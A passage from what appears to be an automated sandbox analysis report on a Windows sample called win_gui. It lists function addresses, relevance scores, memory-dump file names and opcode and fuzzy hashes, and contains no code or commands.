                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cd8ca64db373c85f2f802aa2d98134b5925cdd55f08544ed87feebe6b987d32e
                                  • Instruction ID: 8879791420ab985f5f0c16553da38f25f4a674c8ceeeb96cfd2f132304f13971
                                  • Opcode Fuzzy Hash: cd8ca64db373c85f2f802aa2d98134b5925cdd55f08544ed87feebe6b987d32e
                                  • Instruction Fuzzy Hash: 7A9106729087558FD750EF28A8417AFB7DAAFD5304F44052DF989D3203EE31E9488BA6
                                  Function 00614EE0 Relevance: .3, Instructions: 270COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2d32bf8ab148941b6d9d91e9a60e4534f3456b7a10854289aea402d7066131d8
                                  • Instruction ID: c058209b8c4717a5c6027022253fb73c429dbcc90ab7b75b30db0ef50c6b1596
                                  • Opcode Fuzzy Hash: 2d32bf8ab148941b6d9d91e9a60e4534f3456b7a10854289aea402d7066131d8
                                  • Instruction Fuzzy Hash: FDB124719087459FC304CF29C58195AFBE1BFDC304F498A6EF99997311EB31EA858B82
                                  Function 006037B0 Relevance: .3, Instructions: 269COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6e12b81214d4a7d077bc5d771171d2a3e04aead513d4197413232fe679292300
                                  • Instruction ID: 503c6f80ab6621606d3aae6f1f33a91ea4485fb0cd0714c9c40eacd8e488f781
                                  • Opcode Fuzzy Hash: 6e12b81214d4a7d077bc5d771171d2a3e04aead513d4197413232fe679292300
                                  • Instruction Fuzzy Hash: ADA1FF2271A6C79FC30D8E6D48405A9FF617B7610074887DEE8C5EB783C514EAA9C7E2
                                  Function 006147F0 Relevance: .3, Instructions: 261COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8af4c617d603d11af004d9323865fed94134523c91e675b7418ad38d9a00f7d3
                                  • Instruction ID: 747e4f9165c8f15ad6e89e549ef81dce02fe641e37ee3f6a2e6501359b9542d3
                                  • Opcode Fuzzy Hash: 8af4c617d603d11af004d9323865fed94134523c91e675b7418ad38d9a00f7d3
                                  • Instruction Fuzzy Hash: 0EA1A0715087858FC754CF38C4805ABFBE5FF89304F484A6EE48A87252EB31EA85CB46
                                  Function 005C1284 Relevance: .2, Instructions: 245COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6b5048d7c5f536816e1701ffa52fdb1d5e74d887dca5545488f9d6a3246464b2
                                  • Instruction ID: 0a2d9c891e85d183a1c102d51f651c268ecaadeff275b5a2bb028d9f0aedc69f
                                  • Opcode Fuzzy Hash: 6b5048d7c5f536816e1701ffa52fdb1d5e74d887dca5545488f9d6a3246464b2
                                  • Instruction Fuzzy Hash: DFA185B6E006189FCB48CFA9D88099DBBF2FF88314B65816ED405E7315D731AA46CF94
                                  Function 00612B60 Relevance: .2, Instructions: 241COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2210fb0df7ea5e66a09918cfe53dfb6df9d85d8f767804b522df86a94263095e
                                  • Instruction ID: 6fd6042fbee53b160533628f89eb214061f29fd4b2038fca6f2f59f176e395c4
                                  • Opcode Fuzzy Hash: 2210fb0df7ea5e66a09918cfe53dfb6df9d85d8f767804b522df86a94263095e
                                  • Instruction Fuzzy Hash: 389147715047459FC324CF29C89099BBBF5FF99304B488A6EE4EA87702D334EA59CB91
                                  Function 00614AF0 Relevance: .2, Instructions: 240COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 44dadba5f5b0bf06e8d110b26323a92d4e57698b12cba6534ff322fd24986856
                                  • Instruction ID: 459cee46a5b650a0453df2685b3bf650e1b20308d8710a8c5b2484d0797f2a8f
                                  • Opcode Fuzzy Hash: 44dadba5f5b0bf06e8d110b26323a92d4e57698b12cba6534ff322fd24986856
                                  • Instruction Fuzzy Hash: 369192715087458FC715CF28C4806AFBBE6BFD9314F584A2EE5CA83211EB31E988CB56
                                  Function 006130A0 Relevance: .2, Instructions: 240COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4a9a0e797c342399e34e98d094e501e0906e853463f109999c45674e4538daaf
                                  • Instruction ID: 60e9a83369cf1aca226b4dc7c35a72269da40ce3c366176c7779635e3007c7fb
                                  • Opcode Fuzzy Hash: 4a9a0e797c342399e34e98d094e501e0906e853463f109999c45674e4538daaf
                                  • Instruction Fuzzy Hash: 899139715087559FC728CF29C8809A7BBE5EF59300F488A6EE4EA87742D734EA09CB51
                                  Function 00612810 Relevance: .2, Instructions: 220COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 19d8d3a74e41525cb6b25716e72432dcdfb1029fa5557632fc5c1e23903eedf9
                                  • Instruction ID: f6a4526410040930e110e219448ed56810a81cc0c17cf79f7a55faa9fc169eec
                                  • Opcode Fuzzy Hash: 19d8d3a74e41525cb6b25716e72432dcdfb1029fa5557632fc5c1e23903eedf9
                                  • Instruction Fuzzy Hash: 628198719083529FC750CF29C5804AAFBE1EF9A304F484E6DF8D587316D371AA59CB92
                                  Function 0065F240 Relevance: .2, Instructions: 204COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cb8fef9dd76e75eb59c1eeb2f4050ea4eab3c9300ee64cd0e51d0289dce21143
                                  • Instruction ID: 4fbb6902774bdf240ded9ec924827fd9e133ff3bc3b548aad9e8ae97a484de34
                                  • Opcode Fuzzy Hash: cb8fef9dd76e75eb59c1eeb2f4050ea4eab3c9300ee64cd0e51d0289dce21143
                                  • Instruction Fuzzy Hash: DE61CD756006168FDB14DF28C88076AB7E2FB85311F58867CED869B391D730EA4ACB81
                                  Function 00613380 Relevance: .2, Instructions: 204COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bb4a44cd68f332532bf460d6c6159c21a79f85cf94175ce79af39b36b57629ec
                                  • Instruction ID: 13dcf64b49018b3dba2be6be19f6b0777007b166c2b868174b6a2c9349ba4d96
                                  • Opcode Fuzzy Hash: bb4a44cd68f332532bf460d6c6159c21a79f85cf94175ce79af39b36b57629ec
                                  • Instruction Fuzzy Hash: 717190715087508FC325CF69C880AABFBE5EF95304F484A6EF4DA87742D634E648CB56
                                  Function 00612E30 Relevance: .2, Instructions: 203COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3b21ec426f0837e7178fbdc36cbf073d6167929d3b1517ee8b94fbab9c47e283
                                  • Instruction ID: a5d08329ae39d2632e4fb9c9201031c0f80f82e66ac5e5c3b2d3916169e70bb0
                                  • Opcode Fuzzy Hash: 3b21ec426f0837e7178fbdc36cbf073d6167929d3b1517ee8b94fbab9c47e283
                                  • Instruction Fuzzy Hash: FE7190715087818FC725CF69C8809ABFBE5EF99304F088A1EF4DA87742D234E659CB52
                                  Function 00614400 Relevance: .2, Instructions: 191COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 15b9dda0541a99522dce4cfe0ca254a03972315f85e0cfe0e3b9546fe90d1ca7
                                  • Instruction ID: 087ff175f7a814f5e8c56793c7f477b79a29570618c9067444971601e111b2cb
                                  • Opcode Fuzzy Hash: 15b9dda0541a99522dce4cfe0ca254a03972315f85e0cfe0e3b9546fe90d1ca7
                                  • Instruction Fuzzy Hash: 587149715083418FC714CF28C490A6BFBE6FF99314F494A6EE4DA97252D730EA49CB92
                                  Function 005E87E0 Relevance: .2, Instructions: 185COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 24bf6ca59906327bcb6bb96c8b82c28d40c21f0e9f9a4e2d6fde6f7528dc494a
                                  • Instruction ID: 71a95d09b267bcac18e55f039ed394ce4488a16830f8c947fe6707a33cc68dc2
                                  • Opcode Fuzzy Hash: 24bf6ca59906327bcb6bb96c8b82c28d40c21f0e9f9a4e2d6fde6f7528dc494a
                                  • Instruction Fuzzy Hash: DA519D769187468FD708CF19C881A6AB7E1FBC9304F845A2DF986DB311DB35E904CB82
                                  Function 00613900 Relevance: .2, Instructions: 183COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c564dbef58c7cec768969ebabfc350099b5a318604feb1bb02d60d28d3e8f1fe
                                  • Instruction ID: 8a498f61cc039ffe6dfd78a2aa4062ecbcb4d9c763f3576338942dba43c2af30
                                  • Opcode Fuzzy Hash: c564dbef58c7cec768969ebabfc350099b5a318604feb1bb02d60d28d3e8f1fe
                                  • Instruction Fuzzy Hash: 8861AF71604B958AD321CF7CC884797BBE1AF95204F08CA6DD4D68B742E775E689C780
                                  Function 00608960 Relevance: .2, Instructions: 180COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 153959c91bfb4bfba8c009824de9ad104ae9f5b10b4c75e7b06cc7732981e3e3
                                  • Instruction ID: 491df8bcb3621a4acb6c35792e43620dd511d3db25aea05d01439285b3b0e6fe
                                  • Opcode Fuzzy Hash: 153959c91bfb4bfba8c009824de9ad104ae9f5b10b4c75e7b06cc7732981e3e3
                                  • Instruction Fuzzy Hash: 52615E3160D3909FD75ACF2D849056ABFE0AFDA201F488A9EF8D59B347C624D905CB62
                                  Function 0060E3D0 Relevance: .2, Instructions: 179COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a8262b5e7962170ba227c5a749b122ba8ae4fbc9d4c2a1d91c6b33717661d677
                                  • Instruction ID: 86269b774307122dfb4509678f8d315e20bae6095ba1929f70fe10c6d924ffdd
                                  • Opcode Fuzzy Hash: a8262b5e7962170ba227c5a749b122ba8ae4fbc9d4c2a1d91c6b33717661d677
                                  • Instruction Fuzzy Hash: C56152712093A58FD71ACF2C849056ABFE09B96201F488AAEF8D5DF347C525D905CBB2
                                  Function 00610770 Relevance: .2, Instructions: 179COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 93d53bcad77586541c2871b246f8f51b53fa2f7c1e57a663e507d3c60011a4b6
                                  • Instruction ID: d125f4e7e8befa8855cc1f477b37c93762e11a9edeac345e3d0d6711913c8c0b
                                  • Opcode Fuzzy Hash: 93d53bcad77586541c2871b246f8f51b53fa2f7c1e57a663e507d3c60011a4b6
                                  • Instruction Fuzzy Hash: CC6152716093958FDB19CF2C949046AFFE0AA96201F48869EF8D5DB347C524D905CBB2
                                  Function 006084B0 Relevance: .2, Instructions: 177COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
